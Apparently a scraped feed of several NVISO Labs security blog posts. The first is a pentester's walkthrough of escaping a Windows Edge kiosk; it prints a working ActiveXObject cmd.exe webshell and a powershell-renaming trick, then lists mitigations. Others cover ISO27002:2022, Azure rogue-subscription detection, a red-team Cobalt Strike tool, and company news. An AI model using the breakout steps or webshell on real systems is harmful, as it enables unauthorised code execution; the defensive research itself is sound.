🔒
There are new articles available, click to refresh the page.
✇ NVISO Labs

Breaking out of Windows Kiosks using only Microsoft Edge

By: Firat Acar

Introduction

In this blog post, I will take you through the steps that I performed to get code execution on a Windows kiosk host using ONLY Microsoft Edge. Now, I know that there are many resources out there for breaking out of kiosks and that in general it can be quite easy, but this technique was a first for me.

Maybe a little bit of explanation of what a kiosk is for those that don’t know, a kiosk is basically a machine that hosts one or more applications for users with physical access to the machine to use (e.g. a reception booth with a screen where guests can register their arrival at a company). The main idea of a kiosk is that users should not be able to do anything else on the machine, except for using the hosted application(s) in their intended way.

I have to admit, I struggled quite hard to get the eventual code execution on the underlying host, but I was quite happy that I got there by using creative thinking. As far as I could see, I didn’t find a direct guide on how to break out of kiosks the way I did it, thus the reason I made this blog post. At the very end, I will also show a quick and easy breakout that I found in a John Hammond video.

Setup

To start things off, I set up my own little Windows Kiosk in a virtual machine. I’m not going to detail how to set up a kiosk in this blog post, but here’s a nice little video on Youtube on how to set one up yourself.

Our little kiosk

In this configuration, there is a URL bar and a keyboard available, which makes the kiosk escape quite a bit easier, but there are plenty of breakout tactics even without access to the URL bar. I’ll show an example later on.

As you can see, there is no internet access either, so we can’t simply browse to a kiosk pwning website to get an easy win. Furthermore, the Microsoft Edge browser in Windows Kiosk Mode is also restricted in several ways, which means that we can’t tamper with the settings or configurations. More information about the restrictions can be found here.

Escaping Browser Restrictions

First things first, it would be nice to escape the restricted Microsoft Edge browser so we can at least have some breathing room and more options available to us. Before we do this, let’s make use of the web URL bar to browse local directories and see the general structure of the underlying system.

Although this might possibly reveal interesting information, I sadly didn’t find a “passwords.txt” file with the local administrator password on our desktop.

If you use an alternative protocol in a URL bar, the operating system will, in some cases, prompt the user to select an application to execute the operation. Look what happens when we browse to “ftp://something”:

Interesting, right?

We can possibly browse and select any application to launch this URL with. Sadly, though, Windows Kiosk Mode is pretty locked down (so far) and only allows Microsoft Edge to run as configured. So let’s select Microsoft Edge as our application. NOTE that you should deselect the “Always use this app” checkbox, otherwise you won’t be able to do this again later. If you select this checkbox (which it is by default), then you won’t get prompted when trying to use the same protocol again.

Look at that! We now have an unrestricted Microsoft Edge browser to play around with. Before we move on to code execution, let’s take a look at an alternative way we could’ve achieved this without using the URL bar.

So let’s go back to the restricted Edge browser and use some keyboard magic this time. As I’ve said earlier, we’re not going through all methodologies, but you can find a nice cheatsheet here and a blogpost made by Trustedsec over here .

In the restricted Edge browser, you can use keyboard combinations like “ctrl+o” (open file), “ctrl+s” (save file) and “ctrl+p” (print file) to launch an Explorer window. With the “ctrl+p” method, you’d also need to select “Microsoft Print to PDF” and then click the “Print” button to spawn the Explorer window. Let’s use “ctrl+o”:

And here it is, a nice way to spawn a new unrestricted Edge browser by just entering “msedge.exe” in the toolbar and pressing enter. At this point, I had tried to spawn “cmd.exe” or something similar, but everything was blocked by the kiosk configuration.

Gaining Code Execution

To gain code execution with the new, unrestricted Edge browser, I had to resort to some creative thinking. I already knew plain old Javascript wasn’t going to execute shell commands for me, except if NodeJS was installed on the system (spoiler alert, it wasn’t), so I started to look for something else.

After Googling around for a bit on how to execute shell commands using Javascript, I came across the following post on Stack Overflow, which details how we could use ActiveXObject to execute shell commands on Windows operating systems.

Bingo? Not quite yet, as there’s a catch to this. The usage of shell-executing functions in Javascript, such as ActiveXObject, do not work via Microsoft Edge, as they are quite insecure. I still tried it out, but the commands did indeed not execute. At this point, it became clear to me that I either had to find another route or dig deeper into how ActiveXObject and Microsoft Edge work.

Another round of Googling brought me to yet another post, which touches on the subject of running ActiveXObject via Microsoft Edge. One answer piqued my interest immediately:

Apparently, there’s a way to run Microsoft Edge in Internet Explorer mode? I had never heard of this before, as I usually don’t use Edge myself. Nevertheless, I looked further into this using Google and the unrestricted Edge browser that we spawned earlier.

So here’s how we’re going to run Microsoft Edge in Internet Explorer mode, but let’s go through it step by step. First, in our unrestricted Edge browser, we will go to Settings > Default browser:

Here, we can set “Allow sites to be reloaded in Internet Explorer mode” to “Allow” and we can also already add the full path to our upcoming webshell in the “Internet Explorer mode pages” tab. We can only save documents to our own user’s downloads folder, so that seems like a good location to store a “pwn.html” webshell. Note that “pwn.html” does not exist yet, we will create it later.

If we now click the blue restart button, there’s only one thing left to do and that’s getting the actual code to a html file on disk without using a text editor like Notepad. Some quick thinking led me to the idea of using the developer console to change the current page’s HTML code and then saving it to disk.

First, just to be sure, we need to get rid of other HTML / Javascript code that might interfere with our own code. Go ahead and delete pretty much everything on the page, except the already existing <html> and <body> tags. We will then write the webshell code snippet displayed below in the developer console:

<script>
    function shlExec() {
        var cmd = document.getElementById('cmd').value
        var shell = new ActiveXObject("WScript.Shell");
        try {
            var execOut = shell.Exec("cmd.exe /C \"" + cmd + "\"");
        } catch (e) {
            console.log(e);
        }

        var cmdStdOut = execOut.StdOut;
        var out = cmdStdOut.ReadAll();
        alert(out);
    }
</script>

<form onsubmit="shlExec()">
    Command: <input id="cmd" name="cmd" type="text">
    <input type="submit">
</form> 

Once all the default Edge clutter is removed, the page source should look something like this:

Let’s save this page (ctrl+s or via menu) as “pwn.html” as we planned earlier and then browse to it.

Notice the popup prompt at the bottom of the page asking us to allow blocked content. We’ll go ahead and allow said content. If we now use our little webshell to execute commands:

We will need to approve this popup windows everytime we execute commands, but look what we get after we accept!

So yeah, all of this is quite some effort, but at least it’s another way of gaining command execution on a kiosk system using only Microsoft Edge.

Alternative Easy Path

It was only after the project ended that I encountered a Youtube video from John Hammond where he completely invalidates my efforts and gets code execution in a really simple way. Honestly, I can’t believe I didn’t think about this before.

Starting from an unrestricted browser, one can simply start by downloading “powershell.exe” from “C:\Windows\System32\WindowsPowershell\V1.0”.

Then in the downloads folder, rename the “powershell.exe” to “msedge.exe” and execute it.

Something like this could potentially be fixed by only allowing Edge to run from its original, full path, but it still works on the newest Windows 11 kiosk mode at the time of writing this blog post.

Mitigation

As for mitigating kiosk breakouts like these, there are a few things that I can advise you to help prevent them. Note that this is not a complete list.

  • If possible, hide the URL bar completely to further prevent the alternative protocol escape. If hiding the URL bar is not an option, maybe look into pre-selecting alternative protocol apps with the “Always use this application” checkmark.
  • Disable or remap keys like ctrl, alt… . It’s also possible to provide a keyboard that doesn’t have these keys.
  • Enable AppLocker to only allow applications to run from whitelisted destinations, such as “C:\Program Files”. Keep in mind that AppLocker can easily be misconfigured and then bypassed, so set it to be quite strict for kiosks.
  • Configure Microsoft Edge in the following ways:
    • Computer Configuration > Administrative Templates > Windows Components > Microsoft Edge > Enable “Prevent access to the about:flags page in Microsoft Edge”
    • Block access to “edge://settings”, you could do this by editing the local kiosk user’s Edge settings before deploying the kiosk mode itself

References

Microsoft – Configure Microsoft Edge kiosk mode

https://docs.microsoft.com/en-us/deployedge/microsoft-edge-configure-kiosk-mode

Github – Kiosk Example Page

https://github.com/KualiCo/kiosk

Pentest Diary – Kiosk breakout cheatsheet

http://pentestdiary.blogspot.com/2017/12/kiosk-breakout-cheatsheet.html

Trustedsec – Kiosk breakout keys in Windows

https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/

Youtube – How to set up Windows Kiosk Mode

https://www.youtube.com/watch?v=4dEYKLxXBxE

John Hammond – Kiosk Breakout

https://youtu.be/aBMvFmoMFMI?t=1385

Stack Overflow – Javascript shell execution

https://stackoverflow.com/questions/44825859/get-output-on-shell-execute-in-js-with-activexobject

Microsoft – ActiveXObject in Micrososft Edge

https://answers.microsoft.com/en-us/microsoftedge/forum/all/enable-activex-control-in-microsoft-edge-latest/979e619d-f9f2-47da-9e7d-ffd755234655

Browserhow – Microsoft Edge in IE Mode

https://browserhow.com/how-to-enable-and-use-ie-mode-in-microsoft-edge/

Stack Overflow – Disable Shortcut Keys

https://superuser.com/questions/1131889/disable-all-keyboard-shortcuts-in-windows

About The Author

Firat is a red teamer in the NVISO Software Security & Assessments team, focusing mostly on Windows Active Directory, malware and tools development, and internal / external infrastructure pentests.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

What ISO27002 has in store for 2022

By: Nick Van den Bossche

In current times, security measures have become increasingly important for the continuity of our businesses, to guarantee the safety for our clients and to confirm our company’s reputation.

While thinking of security, our minds will often jump to the ISO/IEC 27001:2013 and ISO/IEC 27002:2013 standards. Especially in Europe & Asia, these have been the leading standards for security since, well… 2013. As of 2022, things will change as ISO has recently published an update of its ISO/IEC 27002:2022 and is planning on releasing an update of  ISO/IEC 27001:2022 during this year. However, little to no updates to the ISO/IEC 27001:2022 are expected, beyond the amending its Annex A to the new control structure of ISO/IEC 27002:2022.

No ISO stands on its own. This mean that by extension, the new standards will be affecting various other standards including ISO/IEC 27017, ISO/IEC 27018, ISO/IEC 27701. So, make sure to keep an eye on the new ISO/IEC 27001/27002 releases if you are certified for either of those as well.

“The new ISO this, the new ISO that”: By now you are probably wondering what they actually added, changed and removed. We’ve got you covered.

Let’s begin with the new title that the document will have, being “Information Security, cybersecurity and privacy protection – Information Security Control”, instead of the previous iterations where it was called “Code of practice for information security controls”. The change in the title seems to acknowledge that there is a difference between information security and cybersecurity, adding the need to include data privacy to the topics covered in the standard.

As part of the content, the main changes introduced in ISO/IEC 27002:2022 revolve around the structure of the available controls, meaning the way these are organized within the standard itself. The re-organization of the controls aims to update the current standard to reflect the current cyber threat landscape: they have increased the level of efficiency of the standard by merging certain high-level controls into a single control or introducing more specific controls.

In particular, the controls have been re-grouped into four main categories, instead of the fourteen found in the 2013 version. These categories are as follows:

  • 5. Organizational controls (37 controls)
  • 6. Organization of Information Security (8 controls)
  • 7. Physical Controls (14 controls)
  • 8. Technological controls (34 controls)

On top of that they have trimmed down the number of controls from a total of one hundred and fourteen in the previous version to ninety-three currently. This is not the end of the improvements on efficiency. Both in terms of reading and analysing the standard, the introduction of complementary tagging will certainly help you out during the implementation and preparation leading up to your certification. We know of the following families of tags that are being introduced:

As mentioned above, ISO has done a fair bit of trimming in the controls, this was not limited to the removal of controls or combining multiple controls into one. In ISO/IEC 27002, twelve new controls were introduced. All these controls reflect the intention of ISO to have this latest version cover some of the most important trends regarding new technologies that have a strong relation with security, as reflected in the new title as well. Examples are: Threat Intelligence, Cloud Services and Data Privacy, of which the latter two are also being covered by separate ISO Standards, respectively ISO/IEC 27017 and ISO/IEC 27701.

We wonder, why does including these controls in ISO/IEC 27002:2022 help shape some of the new trends of cybersecurity? One explanation we can attribute this to is the ever-growing threat landscape. The increase of vulnerabilities, like the Log4J we have seen in the past few months, increases the need to update ISO/IEC 27002. A second explanation lies in the demand for increased interoperability between ISO standards by unifying the controls and adding the aforementioned tagging system.

Proof of this interoperability can be also found if we take a look at the operation capabilities such as Asset Management (Classification of Information and Asset Handling). These were already implicitly covering data privacy and threat intel in the 2013 version, which in the new release are more prevalent among the controls. As with Asset Management, Access Control (Logging & Monitoring thereof and Access Management) will also be integrated by the introduction of the new cloud related controls.

The interoperability is not limited to ISO either. Many of the operational capabilities that are covered by the controls as part of ISO/IEC 27001 will also be covered by controls that are part of other certifications, like PCI-DSS, NIST, QTSP (ETSI), SWIFT and ISAE3402. This is not to say that you should not aim for an ISO certification, if your company already has one or more of those other certifications we just mentioned. Certifying to ISO/IEC 27001 should go rather smoothly if you already have a framework in place from a different certification and there is no harm in improving your company’s security.

The ISO controls can offer an entirely new approach to mitigate certain risks that you would not have thought of otherwise. If you have the resources to expand your list of certifications with ISO/IEC 27001:2022, we can only recommend doing so and adding an extra layer of defence to your security framework.

We can already see some of you worry: “We’ve only recently got certified to ISO/IEC 27001?” or “We are in the middle of the audit, but it won’t be over by the time the new ISO/IEC 27001 releases, is all that effort wasted?”. We can assure you that there is no reason to panic. Only when the ISO/IEC 27001:2022 is released, will the ISO Accreditation Bodies be able to start certifying against it, as part of the standard 3-year audit cycle defined by ISO. However, companies will be granted a period to fully comprehend and adapt to the new standard before undergoing the audit for recertification, and ISO surveillance / (re)certification audits are not expected to use the new ISO/IEC 27001:2022 version for at least 1 year after its public release. Whether you start on your endeavour to become ISO/IEC 27001 certified or whether you want to commence with the transposing of your current ISO/IEC 27001:2013 certification to the new 2022 flavour, know that NVISO is there to help you! NVISO has developed a proven service to become ISO certified for the new adopters, as well as an “ISO quick scan” for the companies already holding the 2013 certification, where we assist and kickstart your transition to the ISO/IEC 27001:2022 certification.

✇ NVISO Labs

Detecting & Preventing Rogue Azure Subscriptions

By: Maxime Thiebaut

A few weeks ago, NVISO observed how a phishing campaign resulted in a compromised user creating additional attacker infrastructure in their Azure tenant. While most of the malicious operations were flagged, we were surprised by the lack of logging and alerting on Azure subscription creation.

Creating a rogue subscription has a couple of advantages:

  • By default, all Azure Active Directory members can create new subscriptions.
  • New subscriptions can also benefit from a trial license granting attackers $200 worth of credits.
  • By default, even global administrators have no visibility over such new subscriptions.

In this blog post we will cover why rogue subscriptions are problematic and revisit a solution published a couple of years ago on Microsoft’s Tech Community. Finally, we will conclude with some hardening recommendations to restrict the creation and importation of Azure subscriptions.

Don’t become ‘that’ admin…

The deployments and recommendations discussed throughout this blog post require administrative privileges in Azure. As with any administrative actions, we recommend you exercise caution and consider any undesired side-effects privileged changes could cause.

With the above warning in mind, global administrators in a hurry can directly deploy the logging of available subscriptions (and reading the hardening recommendations)…

Deploy to Azure

Azure’s Hierarchy

To understand the challenges behind logging and monitoring subscription creations, one must first understand how Azure’s hierarchy looks like.

In Azure, resources such as virtual machines or databases are logically grouped within resource groups. These resource groups act as logical containers for resources with a similar purpose. To invoice the usage of these resources, resource groups are part of a subscription which also defines quotas and limits. Finally, subscriptions are part of management groups which provides centralized management for access, policies or compliance.

Figure 1: Management levels and hierarchy in “Organize your Azure resources effectively” on docs.microsoft.com.

Most Azure components are resources as is the case with monitoring solutions. As an example, creating an Azure Sentinel instance will require the prior creation of a subscription. This core hierarchy of Azure implies that monitoring and logging is commonly scoped to a specific set of subscriptions as can be seen when creating rules.

Figure 2: Alert rules and their scope selection limited to predefined subscriptions in the Azure portal.

This Azure hierarchy creates a problem of the chicken or the egg: monitoring for subscription creations requires prior knowledge of the subscription.

Another small yet non negligible Azure detail is that by default even global administrators cannot view all subscriptions. As detailed in “Elevate access to manage all Azure subscriptions and management groups“, viewing all subscriptions first requires additional elevation through the Azure Active Directory properties followed by the unchecking of the global subscription filter.

Figure 3: The Azure Active Directory access management properties.
Figure 4: The global subscriptions filter enabled by default in the Azure portal.

The following image slider shows the view prior (left) and after (right) the above elevation and filtering steps have been taken.

Figure 5: Subscriptions before (left) and after (right) access elevation and filter removal in the Azure portal.

In the compromise NVISO observed, the rogue subscriptions were all named “Azure subscription 1”, matching the default name enforced by Azure when leveraging free trials (as seen in the above figure).

Detecting New Subscriptions

A few years ago a Microsoft’s Tech Community blog post covered this exact challenge and solved it through a logic app. This following section revisits their solution with a slight variation using Azure Sentinel and system-assigned identities. Through a simple logic app, one can store the list of subscriptions in a log analytics workspace for which an alert rule can then be set up to alert on new subscriptions.

Deploy to Azure

Collecting the Subscription Logs

The first step in collecting the subscription logs is to create a new empty logic app (see the “Create a Consumption logic app resource” documentation section for more help). Once created, ensure the logic app has system-assigned identity enabled from it’s identity settings.

Figure 6: A logic app’s identity settings in the Azure portal.

To grant the logic app reader access to the Azure Management API, go to the management groups and open the “Tenant Root Group”.

Figure 7: The management groups in the Azure portal.

Within the “Tenant Root Group”, open the access control (IAM) settings and click “Add” to add a new access.

Figure 8: The tenant root group’s access control (IAM) in the Azure portal.

From the available roles, select the “Reader” role which will grant your logic app permissions to read the list of subscriptions.

Figure 9: A role assignment’s role selection in the Azure portal.

Once the role selected, assign it to the logic app’s managed identity.

Figure 10: A role assignment’s member selection in the Azure portal.

When the logic app’s managed identity is selected, feel free to document the role assignment’s purpose and press “Review + assign”.

Figure 11: A role assignment’s member selection overview in the Azure portal.

With the role assignment performed, we can move back to the logic app and start building the logic to collect the subscriptions. From the logic app’s designer, select a “Recurrence” trigger which will trigger the collection at a set interval.

Figure 12: An empty logic app’s designer tool in the Azure portal.

While the original Microsoft Tech Community blog post had an hourly recurrence, we recommend to lower that value (e.g. 5 minutes or less, the fastest interval for alerting) given we observed the subscription being rapidly abused.

Figure 13: A recurrence trigger in a logic app’s designer tool.

With the trigger defined, click the “New step” button to add an operation. To recover the list of subscriptions search for, and select, the “Azure Resource Manager List Subscriptions” action.

Figure 14: Searching for the Azure Resource Manager in a logic app’s designer tool.

Select your tenant and proceed to click “Connect with managed identity” to have the authentication leverage the previously assigned role.

Figure 15: The Azure Resource Manager’s tenant selection in a logic app’s designer tool.

Proceed by naming your connection (e.g.: “List subscriptions”) and validate the managed identity is the system-assigned one. Once done, press the “Create” button.

Figure 16: The Azure Resource Manager’s configuration in a logic app’s designer tool.

With the subscriptions recovered, we can add another operation to send them into a log analytics workspace. To do so, search for, and select, the “Azure Log Analytics Data Collector Send Data” operation.

Figure 17: Searching for the Log Analytics Data Collector in a logic app’s designer tool.

Setting up the “Send Data” action requires the target Log Analytics’ workspace ID and primary key. These can be found in the Log Analytics workspace’s agents management settings.

Figure 18: A log analytics workspace’s agent management in the Azure portal.

In the logic app designer, name the Azure Log Analytics Data Collector connection (e.g.: “Send data”) and provide the target Log Analytics’ workspace ID and primary key. Once done, press the “Create” button.

Figure 19: The Log Analytics Data Collector’s configuration in a logic app’s designer tool.

We can then select the JSON body to send. As we intend to store the individual subscriptions, look for the “Item” dynamic content which will contain each subscription’s information.

Figure 20: The Log Analytics Data Collector’s JSON body selection in a logic app’s designer tool.

Upon selecting the “Item” content, a loop will automatically encapsulate the “Send Data” operation to cover each subscription. All that remains to be done is to name the custom log, which we’ll name “SubscriptionInventory”.

Figure 21: The encapsulation of the Log Analytics Data Connector in a for-each loop as seen in a logic app’s designer tool.

Once this last step configured, the logic app is ready and can be saved. After a few minutes the new custom SubscriptionInventory_CL table will get populated.

Alerting on New Subscriptions

While collecting the logs was the hard part, the last remaining step is to create an analytics rule to flag new subscriptions. As an example, the following KQL query identifies new subscriptions and is intended to run every 5 minutes.

let schedule = 5m;
SubscriptionInventory_CL
| summarize arg_min(TimeGenerated, *) by SubscriptionId
| where TimeGenerated > ago(schedule)

A slightly more elaborate query variant can take base-lining and delays into account which is available either packaged within the complete ARM (Azure Resource Manager) template or as a standalone rule template.

Once the rule deployed, new subscriptions will result in incidents being created as shown below. These incidents provide much-needed signals to identify potentially rogue subscriptions prior to their abuse.

Figure 22: A custom “Unfamiliar Azure subscription creation” incident in Azure Sentinel.

To empower your security team to investigate such events, we do recommend you grant them with Reader rights on the “Tenant Root Group” management group to ensure these rights are inherited on new subscriptions.

Hardening an Azure Tenant

While logging and alerting are great, preventing an issue from taking place is always preferable. This section provides some hardening options that Azure administrators might want to consider.

Restricting Subscription Creation

Azure users are by default authorized to sign up for a cloud service and have an identity automatically be created for them, a process called self-servicing. As we saw throughout this blog post, this opens an avenue for free trials to be abused. This setting can however be controlled by an administrator through the Set-MsolCompanySettings cmdlet’s AllowAdHocSubscriptions parameter.

AllowAdHocSubscriptions controls the ability for users to perform self-service sign-up. If you set that parameter to $false, no user can perform self-service sign-up.

docs.microsoft.com

As such, Azure administrators can prevent users from singing up for services (incl. free trials), after careful consideration, through the following MSOnline PowerShell command:

Set-MsolCompanySettings -AllowAdHocSubscriptions $false

Restricting Management Group Creation

Another Azure component users should not usually interact with are management groups. As stated previously, management groups provide centralized management for access, policies or compliance and act as a layer above subscriptions.

By default any Azure AD security principal has the ability to create new management groups. This setting can however be hardened in the management groups’ settings to require the Microsoft.Management/managementGroups/write permissions on the root management group.

Figure 23: The management groups settings in the Azure portal.

Restricting Subscriptions from Switching Azure AD Directories

One final avenue of exploitation which we haven’t seen being abused so far is the transfer of subscriptions into or from your Azure Active Directory environment. As transferring subscriptions poses a governance challenge, the subscriptions’ policy management portal offers two policies capable of prohibiting such transfers.

We highly encourage Azure administrators to consider enforcing these policies.

Figure 24: The subscriptions’ policies in the Azure portal.

Conclusions

In this blog post we saw how Azure’s default of allowing anyone to create subscriptions poses a governance risk. This weak configuration is actively being leveraged by attackers gaining access to compromised accounts.

We revisited a solution initially published on Microsoft’s Tech Community and proposed slight improvements to it alongside a ready-to-deploy ARM template.

Finally, we listed some recommendations to harden these weak defaults to ensure administrative-like actions are restricted from regular users.


You want to move to the cloud, but have no idea how to do this securely?
Having problems applying the correct security controls to your cloud environment?

✇ NVISO Labs

NVISO approved as APT Response Service Provider

By: Sebastian Tischer

NVISO is proud to announce that it has successfully qualified as an APT Response service provider and is now recommended on the website of the German Federal Office for Information Security (BSI).  

Advanced Persistent Threats (APT) are typically described as attack campaigns in which highly skilled, often state-sponsored, intruders orchestrate targeted, long-term attacks. Due to their complex nature, these types of attacks pose a serious threat to any company or organisation.  

The main purpose of the German Federal Office for Information Security (BSI) is to provide advice and support to operators of critical infrastructure and recommend qualified incident response service providers that comply  with their strict quality requirements. 

It is with great pride that we can now confirm that NVISO has passed the rigorous BSI assessment and we are thus listed as a recommended APT Response service provider.  

To attain the coveted BSI recommendation, we had to demonstrate the quality of the service offered by NVISO.  

This included amongst others:  

  • 24×7 readiness and availability of the incident response team  
  • An ISO27001 certification covering the entire organisation  
  • The ability to perform malware analysis and forensics (on hosts and on the network) 
  • Our experts spent multiple hours in interview sessions where they showcased their experience and expertise in dealing with cyber threats.  

Already a European cyber security powerhouse employing a variety of world-class experts (e.g. SANS Instructors, SANS Authors and forensic tool developers), this new recognition further highlights NVISO’s position as a leading European player that can deliver world-class cyber security services.  

Next to our incident response services, NVISO can also help you improve your overall cyber security posture before an incident happens. Our services span a variety of security consulting and managed security services.  

Please don’t hesitate to get in touch!  

[email protected] 
+49 69 9675 8554  

  

About NVISO  

Our mission is to safeguard the foundations of European society from cyber-attacks.  

NVISO is a pure-play cyber security services firm founded in 2013. Over 150 specialized security experts in Belgium, Germany, Austria and Greece help to make our mission a reality.  

DEUTSCH

NVISO ist stolz, bekannt zu geben, dass wir nach erfolgreicher Bewertung vom Bundesamt für Sicherheit in der Informationstechnik (BSI) als Qualifizierter APT-Response-Dienstleister gelistet sind. 

Advanced Persistent Threats (APT) sind gezielte Cyberangriffe über einen längeren Zeitraum hinweg. Sie gehen häufig von gut ausgebildeten, staatlich gesteuerten Angreifern aus. Aufgrund ihrer Komplexität sind sie eine ernsthafte Gefährdung für alle Unternehmen oder Institutionen. 

Die Hauptaufgabe des Bundesamts für Sicherheit in der Informationstechnik (BSI) ist, Betreiber Kritischer Infrastrukturen zu beraten und qualifizierte Incident Response Dienstleister zu empfehlen. 

Mit großem Stolz können wir jetzt bekannt geben, dass NVISO erfolgreich den aufwändigen Qualifizierungsprozess durchlaufen hat und wir als empfohlener APT-Dienstleister auf der Website des Bundesamts für Sicherheit in der Informationstechnik (BSI) gelistet sind. 

NVISO’s Servicequalität überzeugte das BSI anhand folgender Kriterien, worauf es die begehrte Empfehlung aussprach: 

  • 24×7 Bereitschaft des Incident Response Teams 
  • ISO27001 Zertifizierung für das gesamte Unternehmen  
  • Durchführung von Malware-Analyse, Host- und Netzwerkforensik 
  • Unsere Experten wurden in einem mehrstündigen Interview zu ihren Fähigkeiten und Erfahrungen im Umgang mit Cyber-Bedrohungen befragt 

Wir sind stolz darauf, dass erstklassige Experten bei NVISO arbeiten (u.a. SANS Instruktoren, SANS Autoren und Entwickler von Forensik-Tools). Die Auszeichnung des BSI hebt die Position von NVISO als echte Größe in Europa weiter hervor. 

NVISO bietet eine große Bandbreite herausragender Cybersecurity Services an. Wir helfen mit zielgerichteter Beratung und Managed Security Services ihre gesamte Sicherheitslage zu verbessern – noch bevor Zwischenfälle passieren. 

  

Wir freuen uns auf Ihre Anfrage! 

[email protected]
+49 69 9675 8554  

  

Über NVISO 

Unsere Mission ist die Grundfesten der europäischen Gesellschaft vor Cyberangriffen zu schützen. NVISO wurde 2013 als reines Cybersecurity-Unternehmen gegründet. Über 150 Experten in Deutschland, Österreich, Belgien und Griechenland arbeiten mittlerweile an der Umsetzung unserer Mission. 



✇ NVISO Labs

Introducing pyCobaltHound – Let Cobalt Strike unleash the Hound

By: Adriaan Neijzen

Introduction

During our engagements, red team operators often find themselves operating within complex Active Directory environments. The question then becomes finding the needle in the haystack that allows the red team to further escalate and/or reach their objectives. Luckily, the security community has already come up with ways to assist operators in answering these questions, one of these being BloodHound. Having a BloodHound collection of the environment you are operating in, if OPSEC allows for it, often gives a red team a massive advantage.

As we propagate laterally throughout these environments and compromise key systems, we tend to compromise a number of users along the way. We therefore find ourselves running the same Cypher queries for each user (e.g. “Can this user get me Domain Admin?” or “Can this user help me get to my objective?”). You never know after all, there could have been a Domain Admin logged in to one of the workstations or servers you just compromised.

This led us to pose the question: “Can we automate this to simplify our lives and improve our situational awareness?”

To answer our question, we developed pyCobaltHound, which is an Aggressor script extension for Cobalt Strike aiming to provide a deep integration between Cobalt Strike and Bloodhound.

Meet pyCobaltHound

You can’t release a tool without a fancy logo, right?

pyCobaltHound strives to assists red team operators by:

  • Automatically querying the BloodHound database to discover escalation paths opened up by newly collected credentials.
  • Automatically marking compromised users and computers as owned.
  • Allowing operators to quickly and easily investigate the escalation potential of beacon sessions and users.

To accomplish this, pyCobaltHound uses a set of built-in queries. Operators are also able to add/remove their own queries to fine tune pyCobaltHound’s monitoring capabilities. This grants them the flexibility to adapt pyCobaltHound on the fly during engagements to account for engagement-specific targets (users, hosts, etc.).

The pyCobaltHound repository can be found on the official NVISO Github page.

Credential store monitoring

pyCobaltHound’s initial goal was to monitor Cobalt Strike’s credential cache (View > Credentials) for new entries. It does this by reacting to the on_credentials event that Cobalt Strike fires when changes to the credential store are made. When this event is fired, pyCobaltHound will:

  1. Parse and validate the data recieved from Cobalt Strike
  2. Check if it has already investigated these entities by reviewing its cache
  3. Add the entities to a cache for future runs
  4. Check if the entities exist in the BloodHound database
  5. Mark the entities as owned
  6. Query the BloodHound database for each new entity using both built-in and custom queries.
  7. Parse the returned results, notify the operator of any interesting findings and write them to a basic HTML report.

Since all of this takes place asynchronously from the main Cobalt Strike client, this process should not block your UI so you can keep working while pyCobaltHound investigates away in the background. If any of the queries for which pyCobaltHound was configured returns an objects, it will notify the operator.

pyCobaltHound returning the number of hits for each query

If asked, pyCobaltHound will also output a simple HTML report where it will group the results per query. This is recommended, since this will allow the operator to find out which specific accounts they should investigate.

A sample pyCobaltHound report

Beacon management

After implementing the credential monitoring, we also enabled pyCobaltHound to interact with existing beacon sessions.

This functionality is especially useful when dealing with users and computers whose credentials have not been compromised (yet), but that are effectively under our control (e.g. because we have a beacon running under their session token).

This functionality can be found in the beacon context menu. Note that these commands can be executed on a single beacon or a selections of beacons.

Mark as owned

The Mark as owned functionality (pyCobaltHound > Mark as owned) can be used to mark a beacon (or collection of beacons) as owned in the BloodHound database.

Investigation

The Investigate functionality (pyCobaltHound > Investigate) can be used to investigate the users and hosts associated with a beacon (or collection of beacons).

In both these cases, both the user and computer associated with the beacon context will be marked as owned or investigated. Before it marks/investigates a computer pyCobaltHound will check if the computer account can be considered as “owned”. Do do so, it will check if the beacon session is running as local admin, SYSTEM or a high integrity session as another user. This behaviour can be changed on the fly however.

Entity investigation

In addition to investigating beacon sessions, we also implemented the option to freely investigate entities. This can be found in the main menu (Cobalt Strike > pyCobaltHound > Investigate ).

This functionality is especially useful when dealing with users and computers whose credentials have not been compromised and are not under our control. We mostly use it to quickly identify if a specific account will help us reach our goals by running it through our custom pathfinding queries. A good use case is investigating each token on a compromised host to see if any of them are worth impersonating.

Standing on the shoulders of giants

pyCobaltHound would not have been possible with out the great work done by dcsync in their pyCobalt repository. The git submodule that pyCobaltHound uses is a fork of their work with only some minor fixes done by us.

About the author

Adriaan is a senior security consultant at NVISO specialized in the execution of red teaming, adversary simulation and infrastructure related assessments.

✇ NVISO Labs

Girls Day at NVISO Encourages Young Guests To Find Their Dream Job

By: Carola Wondrak

NVISO employees in Frankfurt and Munich showcased their work in Cybersecurity to the girls with live hacking demos, a view behind the scenes of NVISO and hands-on tips for their personal online security. Participating in the Germany- Wide “Girls Day”, we further widened the field of future career choices for the young visitors and brought them away from the ideas of “stereotypical male jobs”.

Everyone and their dog know that diversity is not only a nice gimmick, no it is beneficially impacting the success of companies. “Delivering through Diversity”, a study by McKinsey in 2018, reported that companies are much more likely to make decisions that result in financial returns above their industry mean if the team showed gender diversity.

While the first programmers were women, the reality of today is that cybersecurity is a field with more employees who identify as male than female. The image of a typical IT geek with a hoodie in front of a PC could come to mind. But what is also true nowadays, is that IT companies are looking for great new hires, independently from their gender. Given that statistically young women are doing better in German schools, there should be a lot of great female employees – if they would pursue careers in STEM related fields. Breaching into a new field is hard, but it gets easier when you see other’s doing it. For Girls in STEM related fields, it is valuable to have role models like our employees. This is why we at NVISO took the Girls Day initiative at heart and participated in the initiative this week , to be actively part of a change that we see as fundamental.

Girls Day is an initiative that started in 2001 and could be seen like a One-Day- Internship into technical jobs for girls. Based on this, at the same day, a Boys Day is happening to encourage boys to explore career options in care or social jobs. The Girls’ Day is supported and sponsored by the governmental ministries BMFSFJ and BMBF, to promote it throughout Germany and that interested girls can miss school on the day they visit companies.

Within the last 20 years, the initiative has not only grown the target group, it also is now the project with the most participants and also acknowledged worldwide with enthusiasts all over the globe to help fight against the stereotypes that impact “typical” career choices. 72% of the participants 2021 said it was helpful to be there that day to learn about possible future jobs, according to “Datenbasis: Evaluationsergebnisse 2021” by the founders of Girls Day, Kompetenzzetrum Technik- Diversity- Chancengleichheit e.V..

NVISO participated in the initiative for the first time, initiated and lead by Carola Wondrak. “It is more like a win-win-win situation for all participating parties”, she said. “Firstly, We can see what future employees are expecting of the company of the future and learn about their environment. Secondly, we do world- class work here and it is beneficial for us to showcase this and put our pin onto the map.” Grinning she adds, “And thirdly, as the saying goes: You have only understood it well, if you can explain it to a child.”

